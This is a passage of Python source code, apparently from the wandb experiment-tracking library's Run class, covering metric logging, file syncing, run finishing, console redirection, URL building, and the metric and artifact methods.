data,
step = None,
commit = None,
sync = None,
):
"""Log a dict to the global run's history.
Use `wandb.log` to log data from runs, such as scalars, images, video,
histograms, and matplotlib plots.
The most basic usage is `wandb.log({'train-loss': 0.5, 'accuracy': 0.9})`.
This will save a history row associated with the run with `train-loss=0.5`
and `accuracy=0.9`. Visualize logged data in the workspace at wandb.ai,
or locally on a self-hosted instance of the W&B app:
https://docs.wandb.ai/self-hosted
Export data to explore in a Jupyter notebook, for example, with the API:
https://docs.wandb.ai/ref/public-api
Each time you call wandb.log(), this adds a new row to history and updates
the summary values for each key logged. In the UI, summary values show
up in the run table to compare single values across runs. You might want
to update summary manually to set the *best* value instead of the *last*
value for a given metric. After you finish logging, you can set summary:
`wandb.run.summary["accuracy"] = 0.9`.
Logged values don't have to be scalars. Logging any wandb object is supported.
For example `wandb.log({"example": wandb.Image("myimage.jpg")})` will log an
example image which will be displayed nicely in the wandb UI. See
https://docs.wandb.com/library/reference/data_types for all of the different
supported types.
Logging nested metrics is encouraged and is supported in the wandb API, so
you could log multiple accuracy values with `wandb.log({'dataset-1':
{'acc': 0.9, 'loss': 0.3} ,'dataset-2': {'acc': 0.8, 'loss': 0.2}})`
and the metrics will be organized in the wandb UI.
W&B keeps track of a global step so logging related metrics together is
encouraged, so by default each time wandb.log is called a global step
is incremented. If it's inconvenient to log related metrics together
calling `wandb.log({'train-loss': 0.5, commit=False})` and then
`wandb.log({'accuracy': 0.9})` is equivalent to calling
`wandb.log({'train-loss': 0.5, 'accuracy': 0.9})`
wandb.log is not intended to be called more than a few times per second.
If you want to log more frequently than that it's better to aggregate
the data on the client side or you may get degraded performance.
Arguments:
row: (dict, optional) A dict of serializable python objects i.e `str`,
`ints`, `floats`, `Tensors`, `dicts`, or `wandb.data_types`.
commit: (boolean, optional) Save the metrics dict to the wandb server
and increment the step. If false `wandb.log` just updates the current
metrics dict with the row argument and metrics won't be saved until
`wandb.log` is called with `commit=True`.
step: (integer, optional) The global step in processing. This persists
any non-committed earlier steps but defaults to not committing the
specified step.
sync: (boolean, True) This argument is deprecated and currently doesn't
change the behaviour of `wandb.log`.
Examples:
Basic usage
```python
wandb.log({'accuracy': 0.9, 'epoch': 5})
```
Incremental logging
```python
wandb.log({'loss': 0.2}, commit=False)
# Somewhere else when I'm ready to report this step:
wandb.log({'accuracy': 0.8})
```
Histogram
```python
wandb.log({"gradients": wandb.Histogram(numpy_array_or_sequence)})
```
Image
```python
wandb.log({"examples": [wandb.Image(numpy_array_or_pil, caption="Label")]})
```
Video
```python
wandb.log({"video": wandb.Video(numpy_array_or_video_path, fps=4,
format="gif")})
```
Matplotlib Plot
```python
wandb.log({"chart": plt})
```
PR Curve
```python
wandb.log({'pr': wandb.plots.precision_recall(y_test, y_probas, labels)})
```
3D Object
```python
wandb.log({"generated_samples":
[wandb.Object3D(open("sample.obj")),
wandb.Object3D(open("sample.gltf")),
wandb.Object3D(open("sample.glb"))]})
```
For more examples, see https://docs.wandb.com/library/log
Raises:
wandb.Error: if called before `wandb.init`
ValueError: if invalid data is passed
"""
current_pid = os.getpid()
if current_pid != self._pid:
message = "log() ignored (called from pid={}, init called from pid={}). See: https://docs.wandb.ai/library/init#multiprocess".format(
current_pid, self._pid
)
if self._settings._strict:
wandb.termerror(message, repeat=False)
raise errors.LogMultiprocessError(
"log() does not support multiprocessing"
)
wandb.termwarn(message, repeat=False)
return
if not isinstance(data, Mapping):
raise ValueError("wandb.log must be passed a dictionary")
if any(not isinstance(key, string_types) for key in data.keys()):
raise ValueError("Key values passed to `wandb.log` must be strings.")
if step is not None:
# if step is passed in when tensorboard_sync is used we honor the step passed
# to make decisions about how to close out the history record, but will strip
# this history later on in publish_history()
using_tensorboard = len(wandb.patched["tensorboard"]) > 0
if using_tensorboard:
wandb.termwarn(
"Step cannot be set when using syncing with tensorboard. Please log your step values as a metric such as 'global_step'",
repeat=False,
)
if self.history._step > step:
wandb.termwarn(
(
"Step must only increase in log calls. "
"Step {} < {}; dropping {}.".format(
step, self.history._step, data
)
)
)
return
elif step > self.history._step:
self.history._flush()
self.history._step = step
elif commit is None:
commit = True
if commit:
self.history._row_add(data)
else:
self.history._row_update(data)
def save(
self,
glob_str = None,
base_path = None,
policy = "live",
):
""" Ensure all files matching *glob_str* are synced to wandb with the policy specified.
Arguments:
glob_str: (string) a relative or absolute path to a unix glob or regular
path. If this isn't specified the method is a noop.
base_path: (string) the base path to run the glob relative to
policy: (string) on of `live`, `now`, or `end`
- live: upload the file as it changes, overwriting the previous version
- now: upload the file once now
- end: only upload file when the run ends
"""
if glob_str is None:
# noop for historical reasons, run.save() may be called in legacy code
wandb.termwarn(
(
"Calling run.save without any arguments is deprecated."
"Changes to attributes are automatically persisted."
)
)
return True
if policy not in ("live", "end", "now"):
raise ValueError(
'Only "live" "end" and "now" policies are currently supported.'
)
if isinstance(glob_str, bytes):
glob_str = glob_str.decode("utf-8")
if not isinstance(glob_str, string_types):
raise ValueError("Must call wandb.save(glob_str) with glob_str a str")
if base_path is None:
if os.path.isabs(glob_str):
base_path = os.path.dirname(glob_str)
wandb.termwarn(
(
"Saving files without folders. If you want to preserve "
"sub directories pass base_path to wandb.save, i.e. "
'wandb.save("/mnt/folder/file.h5", base_path="/mnt")'
)
)
else:
base_path = "."
wandb_glob_str = os.path.relpath(glob_str, base_path)
if ".." + os.sep in wandb_glob_str:
raise ValueError("globs can't walk above base_path")
with telemetry.context(run=self) as tel:
tel.feature.save = True
if glob_str.startswith("gs://") or glob_str.startswith("s3://"):
wandb.termlog(
"%s is a cloud storage url, can't save file to wandb." % glob_str
)
return []
files = glob.glob(os.path.join(self.dir, wandb_glob_str))
warn = False
if len(files) == 0 and "*" in wandb_glob_str:
warn = True
for path in glob.glob(glob_str):
file_name = os.path.relpath(path, base_path)
abs_path = os.path.abspath(path)
wandb_path = os.path.join(self.dir, file_name)
wandb.util.mkdir_exists_ok(os.path.dirname(wandb_path))
# We overwrite symlinks because namespaces can change in Tensorboard
if os.path.islink(wandb_path) and abs_path != os.readlink(wandb_path):
os.remove(wandb_path)
os.symlink(abs_path, wandb_path)
elif not os.path.exists(wandb_path):
os.symlink(abs_path, wandb_path)
files.append(wandb_path)
if warn:
file_str = "%i file" % len(files)
if len(files) > 1:
file_str += "s"
wandb.termwarn(
(
"Symlinked %s into the W&B run directory, "
"call wandb.save again to sync new files."
)
% file_str
)
files_dict = dict(files=[(wandb_glob_str, policy)])
if self._backend:
self._backend.interface.publish_files(files_dict)
return files
def restore(
self,
name,
run_path = None,
replace = False,
root = None,
):
return restore(name, run_path or self.path, replace, root or self.dir)
def finish(self, exit_code = None):
"""Marks a run as finished, and finishes uploading all data. This is
used when creating multiple runs in the same process. We automatically
call this method when your script exits.
"""
with telemetry.context(run=self) as tel:
tel.feature.finish = True
# detach logger, other setup cleanup
logger.info("finishing run %s", self.path)
for hook in self._teardown_hooks:
hook()
self._teardown_hooks = []
self._atexit_cleanup(exit_code=exit_code)
if self._wl and len(self._wl._global_run_stack) > 0:
self._wl._global_run_stack.pop()
module.unset_globals()
def join(self, exit_code = None):
"""Deprecated alias for `finish()` - please use finish"""
self.finish(exit_code=exit_code)
# TODO(jhr): annotate this
def plot_table(self, vega_spec_name, data_table, fields, string_fields=None): # type: ignore
"""Creates a custom plot on a table.
Arguments:
vega_spec_name: the name of the spec for the plot
table_key: the key used to log the data table
data_table: a wandb.Table object containing the data to
be used on the visualization
fields: a dict mapping from table keys to fields that the custom
visualization needs
string_fields: a dict that provides values for any string constants
the custom visualization needs
"""
visualization = create_custom_chart(
vega_spec_name, data_table, fields, string_fields or {}
)
return visualization
def _set_upgraded_version_message(self, msg):
self._upgraded_version_message = msg
def _set_deleted_version_message(self, msg):
self._deleted_version_message = msg
def _set_yanked_version_message(self, msg):
self._yanked_version_message = msg
def _add_panel(
self, visualize_key, panel_type, panel_config
):
config = {
"panel_type": panel_type,
"panel_config": panel_config,
}
self._config_callback(val=config, key=("_wandb", "visualize", visualize_key))
def _get_url_query_string(self):
s = self._settings
# TODO(jhr): migrate to new settings, but for now this is safer
api = internal.Api()
if api.settings().get("anonymous") != "true":
return ""
api_key = apikey.api_key(settings=s)
return "?" + urlencode({"apiKey": api_key})
def _get_project_url(self):
s = self._settings
r = self._run_obj
if not r:
return ""
app_url = wandb.util.app_url(s.base_url)
qs = self._get_url_query_string()
url = "{}/{}/{}{}".format(
app_url, url_quote(r.entity), url_quote(r.project), qs
)
return url
def _get_run_url(self):
s = self._settings
r = self._run_obj
if not r:
return ""
app_url = wandb.util.app_url(s.base_url)
qs = self._get_url_query_string()
url = "{}/{}/{}/runs/{}{}".format(
app_url, url_quote(r.entity), url_quote(r.project), url_quote(r.run_id), qs
)
return url
def _get_sweep_url(self):
"""Generate a url for a sweep.
Returns:
(str): url if the run is part of a sweep
(None): if the run is not part of the sweep
"""
r = self._run_obj
if not r:
return ""
sweep_id = r.sweep_id
if not sweep_id:
return ""
app_url = wandb.util.app_url(self._settings.base_url)
qs = self._get_url_query_string()
return "{base}/{entity}/{project}/sweeps/{sweepid}{qs}".format(
base=app_url,
entity=url_quote(r.entity),
project=url_quote(r.project),
sweepid=url_quote(sweep_id),
qs=qs,
)
def _get_run_name(self):
r = self._run_obj
if not r:
return ""
return r.display_name
def _display_run(self):
project_url = self._get_project_url()
run_url = self._get_run_url()
sweep_url = self._get_sweep_url()
version_str = "Tracking run with wandb version {}".format(wandb.__version__)
if self.resumed:
run_state_str = "Resuming run"
else:
run_state_str = "Syncing run"
run_name = self._get_run_name()
app_url = wandb.util.app_url(self._settings.base_url)
sync_dir = self._settings._sync_dir
if self._settings._jupyter:
sync_dir = "<code>{}</code>".format(sync_dir)
dir_str = "Run data is saved locally in {}".format(sync_dir)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
sweep_line = (
'Sweep page: <a href="{}" target="_blank">{}</a><br/>\n'.format(
sweep_url, sweep_url
)
if sweep_url
else ""
)
docs_html = '<a href="https://docs.wandb.com/integrations/jupyter.html" target="_blank">(Documentation)</a>' # noqa: E501
ipython.display_html(
"""
{}<br/>
{} <strong style="color:{}">{}</strong> to <a href="{}" target="_blank">Weights & Biases</a> {}.<br/>
Project page: <a href="{}" target="_blank">{}</a><br/>
{}Run page: <a href="{}" target="_blank">{}</a><br/>
{}<br/><br/>
""".format( # noqa: E501
version_str,
run_state_str,
RUN_NAME_COLOR,
run_name,
app_url,
docs_html,
project_url,
project_url,
sweep_line,
run_url,
run_url,
dir_str,
)
)
else:
wandb.termlog(version_str)
wandb.termlog(
"{} {}".format(run_state_str, click.style(run_name, fg="yellow"))
)
emojis = dict(star="", broom="", rocket="")
if platform.system() != "Windows":
emojis = dict(star="⭐️", broom="🧹", rocket="🚀")
wandb.termlog(
"{} View project at {}".format(
emojis.get("star", ""),
click.style(project_url, underline=True, fg="blue"),
)
)
if sweep_url:
wandb.termlog(
"{} View sweep at {}".format(
emojis.get("broom", ""),
click.style(sweep_url, underline=True, fg="blue"),
)
)
wandb.termlog(
"{} View run at {}".format(
emojis.get("rocket", ""),
click.style(run_url, underline=True, fg="blue"),
)
)
wandb.termlog(dir_str)
if not self._settings._offline:
wandb.termlog("Run `wandb offline` to turn off syncing.")
print("")
def _redirect(
self,
stdout_slave_fd,
stderr_slave_fd,
console = None,
):
if console is None:
console = self._settings._console
logger.info("redirect: %s", console)
# out_redir: redirect.RedirectBase
# err_redir: redirect.RedirectBase
if console == self._settings.Console.REDIRECT:
logger.info("Redirecting console.")
# out_cap = redirect.Capture(
# name="stdout", cb=self._redirect_cb, output_writer=self._output_writer
# )
# err_cap = redirect.Capture(
# name="stderr", cb=self._redirect_cb, output_writer=self._output_writer
# )
out_redir = redirect.Redirect(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.Redirect(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
if os.name == "nt":
def wrap_fallback():
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
msg = (
"Tensorflow detected. Stream redirection is not supported "
"on Windows when tensorflow is imported. Falling back to "
"wrapping stdout/err."
)
wandb.termlog(msg)
self._redirect(None, None, console=self._settings.Console.WRAP)
add_import_hook("tensorflow", wrap_fallback)
elif console == self._settings.Console.WRAP:
logger.info("Wrapping output streams.")
out_redir = redirect.StreamWrapper(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.StreamWrapper(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
elif console == self._settings.Console.OFF:
return
else:
raise ValueError("unhandled console")
try:
out_redir.install()
err_redir.install()
self._out_redir = out_redir
self._err_redir = err_redir
logger.info("Redirects installed.")
except Exception as e:
print(e)
logger.error("Failed to redirect.", exc_info=e)
return
# TODO(jhr): everything below here is not executed as we only support redir mode
#
# from wandb.lib import console as lib_console
# from wandb.old import io_wrap
#
# redirect stdout
# if platform.system() == "Windows":
# lib_console.win32_redirect(stdout_slave_fd, stderr_slave_fd)
# else:
# self._save_stdout = sys.stdout
# self._save_stderr = sys.stderr
# stdout_slave = os.fdopen(stdout_slave_fd, "wb")
# stderr_slave = os.fdopen(stderr_slave_fd, "wb")
# stdout_redirector = io_wrap.FileRedirector(sys.stdout, stdout_slave)
# stderr_redirector = io_wrap.FileRedirector(sys.stderr, stderr_slave)
# stdout_redirector.redirect()
# stderr_redirector.redirect()
# self.stdout_redirector = stdout_redirector
# self.stderr_redirector = stderr_redirector
# logger.info("redirect done")
def _restore(self):
logger.info("restore")
# TODO(jhr): drain and shutdown all threads
if self._use_redirect:
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
return
if self.stdout_redirector:
self.stdout_redirector.restore()
if self.stderr_redirector:
self.stderr_redirector.restore()
if self._save_stdout:
sys.stdout = self._save_stdout
if self._save_stderr:
sys.stderr = self._save_stderr
logger.info("restore done")
def _atexit_cleanup(self, exit_code = None):
if self._backend is None:
logger.warning("process exited without backend configured")
return
if self._atexit_cleanup_called:
return
self._atexit_cleanup_called = True
exit_code = exit_code or self._hooks.exit_code if self._hooks else 0
logger.info("got exitcode: %d", exit_code)
if exit_code == 0:
# Cleanup our resume file on a clean exit
if os.path.exists(self._settings.resume_fname):
os.remove(self._settings.resume_fname)
self._exit_code = exit_code
try:
self._on_finish()
except KeyboardInterrupt as ki:
if wandb.wandb_agent._is_running():
raise ki
wandb.termerror("Control-C detected -- Run data was not synced")
if ipython._get_python_type() == "python":
os._exit(-1)
except Exception as e:
self._console_stop()
self._backend.cleanup()
logger.error("Problem finishing run", exc_info=e)
wandb.termerror("Problem finishing run")
traceback.print_exception(*sys.exc_info())
if ipython._get_python_type() == "python":
os._exit(-1)
else:
# if silent, skip this as it is used to output stuff
if self._settings._silent:
return
self._on_final()
def _console_start(self):
logger.info("atexit reg")
self._hooks = ExitHooks()
self._hooks.hook()
atexit.register(lambda: self._atexit_cleanup())
if self._use_redirect:
# setup fake callback
self._redirect_cb = self._console_callback
output_log_path = os.path.join(self.dir, filenames.OUTPUT_FNAME)
self._output_writer = filesystem.CRDedupedFile(open(output_log_path, "wb"))
self._redirect(self._stdout_slave_fd, self._stderr_slave_fd)
def _console_stop(self):
self._restore()
if self._output_writer:
self._output_writer.close()
self._output_writer = None
def _on_init(self):
self._show_version_info()
def _on_start(self):
# TODO: make offline mode in jupyter use HTML
if self._settings._offline:
wandb.termlog(
(
"W&B syncing is set to `offline` in this directory. "
"Run `wandb online` or set WANDB_MODE=online to enable cloud syncing."
)
)
if self._settings.save_code and self._settings.code_dir is not None:
self.log_code(self._settings.code_dir)
if self._run_obj and not self._settings._silent:
self._display_run()
if self._backend and not self._settings._offline:
self._run_status_checker = RunStatusChecker(self._backend.interface)
self._console_start()
def _pusher_print_status(
self,
progress,
prefix = True,
done = False,
):
if self._settings._offline:
return
line = " %.2fMB of %.2fMB uploaded (%.2fMB deduped)\r" % (
progress.uploaded_bytes / 1048576.0,
progress.total_bytes / 1048576.0,
progress.deduped_bytes / 1048576.0,
)
if self._jupyter_progress:
# percent_done: float
if progress.total_bytes == 0:
percent_done = 1
else:
percent_done = progress.uploaded_bytes / progress.total_bytes
self._jupyter_progress.update(percent_done, line)
if done:
self._jupyter_progress.close()
elif not self._settings._jupyter:
spinner_states = ["-", "\\", "|", "/"]
line = spinner_states[self._progress_step % 4] + line
self._progress_step += 1
wandb.termlog(line, newline=False, prefix=prefix)
if done:
dedupe_fraction = (
progress.deduped_bytes / float(progress.total_bytes)
if progress.total_bytes > 0
else 0
)
if dedupe_fraction > 0.01:
wandb.termlog(
"W&B sync reduced upload amount by %.1f%% "
% (dedupe_fraction * 100),
prefix=prefix,
)
# clear progress line.
wandb.termlog(" " * 79, prefix=prefix)
def _on_finish_progress(self, progress, done = None):
self._pusher_print_status(progress, done=done)
def _wait_for_finish(self):
while True:
if self._backend:
poll_exit_resp = self._backend.interface.communicate_poll_exit()
logger.info("got exit ret: %s", poll_exit_resp)
if poll_exit_resp:
done = poll_exit_resp.done
pusher_stats = poll_exit_resp.pusher_stats
if pusher_stats:
self._on_finish_progress(pusher_stats, done)
if done:
return poll_exit_resp
time.sleep(0.1)
def _on_finish(self):
trigger.call("on_finished")
# populate final import telemetry
with telemetry.context(run=self) as tel:
self._telemetry_imports(tel.imports_finish)
if self._run_status_checker:
self._run_status_checker.stop()
# make sure all uncommitted history is flushed
self.history._flush()
self._console_stop() # TODO: there's a race here with jupyter console logging
if not self._settings._silent:
if self._backend:
pid = self._backend._internal_pid
status_str = "Waiting for W&B process to finish, PID {}".format(pid)
if not self._exit_code:
status_str += "\nProgram ended successfully."
else:
status_str += "\nProgram failed with code {}. ".format(self._exit_code)
if not self._settings._offline:
status_str += " Press ctrl-c to abort syncing."
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html("<br/>" + status_str.replace("\n", "<br/>"))
else:
print("")
wandb.termlog(status_str)
# telemetry could have changed, publish final data
if self._backend:
self._backend.interface.publish_telemetry(self._telemetry_obj)
# TODO: we need to handle catastrophic failure better
# some tests were timing out on sending exit for reasons not clear to me
if self._backend:
self._backend.interface.publish_exit(self._exit_code)
# Wait for data to be synced
self._poll_exit_response = self._wait_for_finish()
if self._backend:
ret = self._backend.interface.communicate_summary()
self._final_summary = proto_util.dict_from_proto_list(ret.item)
if self._backend:
ret = self._backend.interface.communicate_sampled_history()
d = {item.key: item.values_float or item.values_int for item in ret.item}
self._sampled_history = d
if self._backend:
self._backend.cleanup()
if self._run_status_checker:
self._run_status_checker.join()
def _on_final(self):
# check for warnings and errors, show log file locations
if self._reporter:
# TODO: handle warnings and errors nicely in jupyter
warning_lines = self._reporter.warning_lines
if warning_lines:
wandb.termlog("Warnings:")
for line in warning_lines:
wandb.termlog(line)
if len(warning_lines) < self._reporter.warning_count:
wandb.termlog("More warnings")
error_lines = self._reporter.error_lines
if error_lines:
wandb.termlog("Errors:")
for line in error_lines:
wandb.termlog(line)
if len(error_lines) < self._reporter.error_count:
wandb.termlog("More errors")
if self._settings.log_user:
log_user = self._settings.log_user
if self._settings._jupyter:
log_user = "<code>{}</code>".format(log_user)
log_str = "Find user logs for this run at: {}".format(log_user)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(log_str)
else:
wandb.termlog(log_str)
if self._settings.log_internal:
log_internal = self._settings.log_internal
if self._settings._jupyter:
log_internal = "<code>{}</code>".format(log_internal)
log_str = "Find internal logs for this run at: {}".format(log_internal)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(log_str)
else:
wandb.termlog(log_str)
self._show_summary()
self._show_history()
self._show_files()
if self._run_obj:
run_url = self._get_run_url()
run_name = self._get_run_name()
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(
"""
<br/>Synced <strong style="color:{}">{}</strong>: <a href="{}" target="_blank">{}</a><br/>
""".format(
RUN_NAME_COLOR, run_name, run_url, run_url
)
)
else:
wandb.termlog(
"\nSynced {}: {}".format(
click.style(run_name, fg="yellow"),
click.style(run_url, fg="blue"),
)
)
if self._settings._offline:
# TODO: handle jupyter offline messages
wandb.termlog("You can sync this run to the cloud by running:")
wandb.termlog(
click.style(
"wandb sync {}".format(self._settings._sync_dir), fg="yellow"
)
)
self._show_version_info(footer=True)
def _show_version_info(self, footer = None):
package_problem = False
if self._deleted_version_message:
wandb.termerror(self._deleted_version_message)
package_problem = True
elif self._yanked_version_message:
wandb.termwarn(self._yanked_version_message)
package_problem = True
# only display upgrade message if packages are bad or in header
if not footer or package_problem:
if self._upgraded_version_message:
wandb.termlog(self._upgraded_version_message)
def _show_summary(self):
if self._final_summary:
logger.info("rendering summary")
max_len = max([len(k) for k in self._final_summary.keys()])
format_str = " {:>%s} {}" % max_len
summary_rows = []
for k, v in iteritems(self._final_summary):
# arrays etc. might be too large. for now we just don't print them
if isinstance(v, string_types):
if len(v) >= 20:
v = v[:20] + "..."
summary_rows.append((k, v))
elif isinstance(v, numbers.Number):
if isinstance(v, float):
v = round(v, 5)
summary_rows.append((k, v))
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
summary_table = ipython.STYLED_TABLE_HTML
for row in summary_rows:
summary_table += "<tr><td>{}</td><td>{}</td></tr>".format(*row)
summary_table += "</table>"
ipython.display_html("<h3>Run summary:</h3><br/>" + summary_table)
else:
summary_lines = "\n".join(
[format_str.format(k, v) for k, v in summary_rows]
)
wandb.termlog("Run summary:")
wandb.termlog(summary_lines)
def _show_history(self):
if not self._sampled_history:
return
# Only print sparklines if the terminal is utf-8
# In some python 2.7 tests sys.stdout is a 'cStringIO.StringO' object
# which doesn't have the attribute 'encoding'
encoding = getattr(sys.stdout, "encoding", None)
if not encoding or encoding.upper() not in ("UTF_8", "UTF-8",):
return
logger.info("rendering history")
max_len = max([len(k) for k in self._sampled_history])
history_rows = []
for key in self._sampled_history:
vals = wandb.util.downsample(self._sampled_history[key], 40)
if any((not isinstance(v, numbers.Number) for v in vals)):
continue
line = sparkline.sparkify(vals)
history_rows.append((key, line))
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
history_table = ipython.STYLED_TABLE_HTML
for row in history_rows:
history_table += "<tr><td>{}</td><td>{}</td></tr>".format(*row)
history_table += "</table>"
ipython.display_html("<h3>Run history:</h3><br/>" + history_table + "<br/>")
else:
wandb.termlog("Run history:")
history_lines = ""
format_str = " {:>%s} {}\n" % max_len
for row in history_rows:
history_lines += format_str.format(*row)
wandb.termlog(history_lines)
def _show_files(self):
if not self._poll_exit_response or not self._poll_exit_response.file_counts:
return
if self._settings._offline:
return
logger.info("logging synced files")
if self._settings._silent:
return
file_str = "Synced {} W&B file(s), {} media file(s), {} artifact file(s) and {} other file(s)".format( # noqa:E501
self._poll_exit_response.file_counts.wandb_count,
self._poll_exit_response.file_counts.media_count,
self._poll_exit_response.file_counts.artifact_count,
self._poll_exit_response.file_counts.other_count,
)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(file_str)
else:
wandb.termlog(file_str)
def _save_job_spec(self):
envdict = dict(python="python3.6", requirements=[],)
varsdict = {"WANDB_DISABLE_CODE": "True"}
source = dict(
git="git@github.com:wandb/examples.git", branch="master", commit="bbd8d23",
)
execdict = dict(
program="train.py",
directory="keras-cnn-fashion",
envvars=varsdict,
args=[],
)
configdict = (dict(self._config),)
artifactsdict = dict(dataset="v1",)
inputdict = dict(config=configdict, artifacts=artifactsdict,)
job_spec = {
"kind": "WandbJob",
"version": "v0",
"environment": envdict,
"source": source,
"exec": execdict,
"input": inputdict,
}
s = json.dumps(job_spec, indent=4)
spec_filename = filenames.JOBSPEC_FNAME
with open(spec_filename, "w") as f:
print(s, file=f)
self.save(spec_filename)
def define_metric(
self,
name,
step_metric = None,
step_sync = None,
hidden = None,
summary = None,
goal = None,
overwrite = None,
**kwargs
):
"""Define metric properties which will later be logged with `wandb.log()`.
Arguments:
name: Name of the metric.
step_metric: Independent variable associated with the metric.
step_sync: Automatically add `step_metric` to history if needed.
Defaults to True if step_metric is specified.
hidden: Hide this metric from automatic plots.
summary: Specify aggregate metrics added to summary.
Supported aggregations: "min,max,mean,best,last,none"
Default aggregation is `copy`
Aggregation `best` defaults to `goal`==`minimize`
goal: Specify direction for optimizing the metric.
Supported direections: "minimize,maximize"
Returns:
A metric object is returned that can be further specified.
"""
if not name:
raise wandb.Error("define_metric() requires non-empty name argument")
for k in kwargs:
wandb.termwarn("Unhandled define_metric() arg: {}".format(k))
if isinstance(step_metric, wandb_metric.Metric):
step_metric = step_metric.name
for arg_name, arg_val, exp_type in (
("name", name, string_types),
("step_metric", step_metric, string_types),
("step_sync", step_sync, bool),
("hidden", hidden, bool),
("summary", summary, string_types),
("goal", goal, string_types),
("overwrite", overwrite, bool),
):
# NOTE: type checking is broken for isinstance and string_types
if arg_val is not None and not isinstance(arg_val, exp_type): # type: ignore
arg_type = type(arg_val).__name__
raise wandb.Error(
"Unhandled define_metric() arg: {} type: {}".format(
arg_name, arg_type
)
)
stripped = name[:-1] if name.endswith("*") else name
if "*" in stripped:
raise wandb.Error(
"Unhandled define_metric() arg: name (glob suffixes only): {}".format(
name
)
)
summary_ops = None
if summary:
summary_items = [s.lower() for s in summary.split(",")]
summary_ops = []
valid = {"min", "max", "mean", "best", "last", "copy", "none"}
for i in summary_items:
if i not in valid:
raise wandb.Error(
"Unhandled define_metric() arg: summary op: {}".format(i)
)
summary_ops.append(i)
goal_cleaned = None
if goal is not None:
goal_cleaned = goal[:3].lower()
valid_goal = {"min", "max"}
if goal_cleaned not in valid_goal:
raise wandb.Error(
"Unhandled define_metric() arg: goal: {}".format(goal)
)
m = wandb_metric.Metric(
name=name,
step_metric=step_metric,
step_sync=step_sync,
summary=summary_ops,
hidden=hidden,
goal=goal_cleaned,
overwrite=overwrite,
)
m._set_callback(self._metric_callback)
m._commit()
with telemetry.context(run=self) as tel:
tel.feature.metric = True
return m
# TODO(jhr): annotate this
def watch(self, models, criterion=None, log="gradients", log_freq=100, idx=None): # type: ignore
wandb.watch(models, criterion, log, log_freq, idx)
# TODO(jhr): annotate this
def use_artifact(self, artifact_or_name, type=None, aliases=None): # type: ignore
""" Declare an artifact as an input to a run, call `download` or `file` on
the returned object to get the contents locally.
Arguments:
artifact_or_name: (str or Artifact) An artifact name.
May be prefixed with entity/project. Valid names
can be in the following forms:
- name:version
- name:alias
- digest
You can also pass an Artifact object created by calling `wandb.Artifact`
type: (str, optional) The type of artifact to use.
aliases: (list, optional) Aliases to apply to this artifact
Returns:
An `Artifact` object.
"""
r = self._run_obj
api = internal.Api(default_settings={"entity": r.entity, "project": r.project})
api.set_current_run_id(self.id)
if isinstance(artifact_or_name, str):
name = artifact_or_name
public_api = self._public_api()
artifact = public_api.artifact(type=type, name=name)
if type is not None and type != artifact.type:
raise ValueError(
"Supplied type {} does not match type {} of artifact {}".format(
type, artifact.type, artifact.name
)
)
api.use_artifact(artifact.id)
return artifact
else:
artifact = artifact_or_name
if aliases is None:
aliases = []
elif isinstance(aliases, str):
aliases = [aliases]
if isinstance(artifact_or_name, wandb.Artifact):
self._log_artifact(
artifact, aliases, is_user_created=True, use_after_commit=True
)
return artifact
elif isinstance(artifact, public.Artifact):
api.use_artifact(artifact.id)
return artifact
else:
raise ValueError(
'You must pass an artifact name (e.g. "pedestrian-dataset:v1"), an instance of wandb.Artifact, or wandb.Api().artifact() to use_artifact' # noqa: E501
)
def log_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
):
""" Declare an artifact as output of a run.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
Returns:
An `Artifact` object.
"""
return self._log_artifact(artifact_or_path, name, type, aliases)
def upsert_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
distributed_id = None,
):
""" Declare (or append tp) a non-finalized artifact as output of a run. Note that you must call
run.finish_artifact() to finalize the artifact. This is useful when distributed jobs
need to all contribute to the same artifact.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
Returns:
An `Artifact` object.
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot upsert artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name,
type,
aliases,
distributed_id=distributed_id,
finalize=False,
)
def finish_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
distributed_id = None,
):
""" Finish a non-finalized artifact as output of a run. Subsequent "upserts" with
the same distributed ID will result in a new version
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
